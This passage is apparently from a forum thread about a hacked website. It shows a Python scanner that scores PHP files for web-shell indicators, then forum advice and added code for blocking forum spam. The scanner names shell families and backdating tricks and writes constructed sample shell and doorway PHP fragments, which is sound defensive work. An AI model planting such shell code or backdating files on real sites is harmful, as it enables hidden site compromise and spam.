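    (r"C99|c99shell|r57shell|antichat", 3, "known shell family string"),
    (r"@?touch\s*\(\s*\$\w+\s*,\s*\$filetime", 2, "re-applies old mtime after write"),
    (r"@?chmod\s*\(.*0777", 1, "forces world-writable permissions"),
    (r"<marquee[^>]*width\s*:\s*0", 2, "zero-width marquee (hidden link block)"),
]
COMPILED = [(re.compile(p, re.I), w, d) for p, w, d in INDICATORS]
EXTERNAL_URL_RX = re.compile(r"https?://([\w.-]+)", re.I)


def score_source(source):
    """Return (score, [indicator descriptions]) for one file's contents."""
    score, hits = 0, []
    for rx, weight, desc in COMPILED:
        if rx.search(source):
            score += weight
            hits.append(desc)
    return score, hits


def external_hosts(source):
    """Hosts referenced by absolute URLs in the file, excluding the site's own."""
    return sorted({h.lower() for h in EXTERNAL_URL_RX.findall(source) if h.lower() != SITE_HOST})


def mtime_backdated(path, slack=3600):
    """True when the inode change time is far newer than the modification time.
    touch() rewrites mtime, but the kernel sets ctime itself, so a backdated file shows a gap."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > slack


def scan_webroot(root, threshold=4):
    """Return {relative path: (score, hits, backdated, external hosts)} for suspicious PHP files."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="latin-1") as fh:   # never fails to decode binary junk
                    source = fh.read()
            except OSError:
                continue
            score, hits = score_source(source)
            backdated = mtime_backdated(path)
            if score >= threshold or backdated:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = (score, hits, backdated, external_hosts(source))
    return findings


# --- constructed sample web root so the example runs stand-alone ---------------------
CLEAN_PHP = "<?php\n$title = 'Hello';\necho htmlspecialchars($title);\n"
SHELL_PHP = ("<?php\n/* @site: http://forum.antichat.ru/ */\n"
             "$_REQUEST = array_merge($_COOKIE,$_POST);\n"
             "foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}\n"
             "extract($_POST);\n@touch($file, $filetime, $filetime);\n"
             "?><title>C99shell k1b0rg Edition</title>\n")
DOORWAY_PHP = ("<?php\n$view='<marquee style=\"position:absolute;width:0px\">';\n"
               "$link = preg_replace_callback('%\\{(.*?)\\}%i', "
               "create_function('$r','return $r[1];'), $link);\n")


def build_sample_root():
    """Write the three sample files to a temp dir and backdate the shell like save_file() does."""
    root = tempfile.mkdtemp(prefix="webroot-")
    theme = os.path.join(root, "templates", "free_theme")
    os.makedirs(theme)
    for rel, body in (("index.php", CLEAN_PHP), ("templates/free_theme/map.php", SHELL_PHP),
                      ("templates/free_theme/door.php", DOORWAY_PHP)):
        with open(os.path.join(root, *rel.split("/")), "w") as fh:
            fh.write(body)
    old = time.time() - 365 * 86400          # mtime a year back; ctime stays "now"
    os.utime(os.path.join(theme, "map.php"), (old, old))
    return root


if __name__ == "__main__":
    for rel, (score, hits, backdated, hosts) in sorted(scan_webroot(build_sample_root()).items()):
        print(f"{rel}: score={score} mtime_backdated={backdated} external={hosts}")
        for h in hits:
            print("   -", h)
```

The scores are a sorting aid, not a verdict: review every flagged file by hand, and treat a backdated mtime as reason to check the whole directory's ctimes, since the shell's replace function rewrites many files in one pass.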

So they basically spammed a bunch of links from your site. You should edit and remove those posts. You don't need search engines indexing the forums with spam links to their sites. That's exactly what they want to do with sites like yours that they hacked, and you just basically did the same thing here without having to hack it.


So they basically spammed a bunch of links from your site. You should edit and remove those posts. You don't need search engines indexing the forums with spam links to their sites. That's exactly what they want to do with sites like yours that they hacked, and you just basically did the same thing here without having to hack it.

I apologize; I deleted the links between the code. I did not realize that search engines would pick up on stuff between the BBcode [ code ] tags. I deleted all of the stuff I could find on the site which looked spam-related, and I am going to go back and do a double check to make sure I got everything.

I've got another website where the forums are getting spammed so hard I may have to go into the database to delete all the posts. I've tried banning IPs and all of that but it seems impossible lol. Is there some kind of way to just ban all IPs from Russia and China?


You can ban Russian and Chinese subnets, sure, but more than likely the addresses will change and they will continue with proxies and compromised machines in other locations. It's a cat-and-mouse game, and the spammers know it. Setting rules for posting and blocking the ability to post links until after a certain number of posts is one thing to add; forcing session cookies with same-domain referring is another; changing your user registration process to make the end user answer basic math or English questions to get rid of automated bots is also something you can try. At the end of the day it's an uphill battle, and if a spammer is determined enough, they will post crap, even if they have to do it manually.

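The controls in the reply above (no links before a post-count threshold, a same-site referrer together with a session-bound form token, and a registration question) combined into one posting-policy check. This Python is an added example, not from the thread or from any forum software; the site name, threshold, blocklist network and message texts are assumptions. The subnet blocklist is included only as the first and weakest layer, for the reason the reply gives.

```python
"""Layered forum posting controls (added example, not from the thread)."""
import hashlib
import hmac
import ipaddress
import re
import secrets
from urllib.parse import urlparse

SITE_HOST = "forum.example.com"        # assumed hostname of the forum
MIN_POSTS_FOR_LINKS = 5                # assumed: posts required before links are allowed
FORM_SECRET = secrets.token_bytes(32)  # per-deployment secret for form tokens
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24",)]  # constructed

# Anything that renders as a link: raw URLs, bare www hosts, or BBcode [url] tags.
LINK_RX = re.compile(r"(https?://|www\.|\[url)", re.I)


def issue_form_token(session_id):
    """Bind the posting form to the visitor's session: a bot cannot post without loading the form."""
    return hmac.new(FORM_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id, token):
    """Constant-time comparison so a forged token cannot be guessed byte by byte."""
    return hmac.compare_digest(issue_form_token(session_id).encode(), (token or "").encode())


def referrer_is_same_site(referer):
    host = urlparse(referer or "").hostname
    return host is not None and host.lower() == SITE_HOST


def ip_blocked(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # unparseable address: treat as blocked
    return any(ip in net for net in BLOCKED_NETWORKS)


def evaluate_post(user_post_count, body, session_id, form_token, referer, remote_addr):
    """Return the reasons a post must be rejected; an empty list means accept."""
    reasons = []
    if ip_blocked(remote_addr):
        reasons.append("source address in blocklist")
    if not token_valid(session_id, form_token):
        reasons.append("missing or foreign form token")
    if not referrer_is_same_site(referer):
        reasons.append("referrer not from this site")
    if user_post_count < MIN_POSTS_FOR_LINKS and LINK_RX.search(body):
        reasons.append(f"links not allowed before {MIN_POSTS_FOR_LINKS} posts")
    return reasons


def registration_challenge():
    """A basic arithmetic question; the expected answer is kept server-side, never in the form."""
    a, b = secrets.randbelow(9) + 1, secrets.randbelow(9) + 1
    return f"What is {a} + {b}?", a + b


def challenge_passed(expected, answer):
    try:
        return int(answer.strip()) == expected
    except (ValueError, AttributeError):
        return False


if __name__ == "__main__":
    token = issue_form_token("sess-1")
    print(evaluate_post(10, "hello", "sess-1", token, "https://forum.example.com/post", "198.51.100.7"))
    print(evaluate_post(0, "buy http://spam.invalid", "sess-1", "bogus", "http://other.invalid/", "203.0.113.9"))
```

The referrer check is advisory only (clients may omit or strip it), so the form token is the control that actually stops scripted posting; the link threshold then limits what a registered bot can gain from a fresh account.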
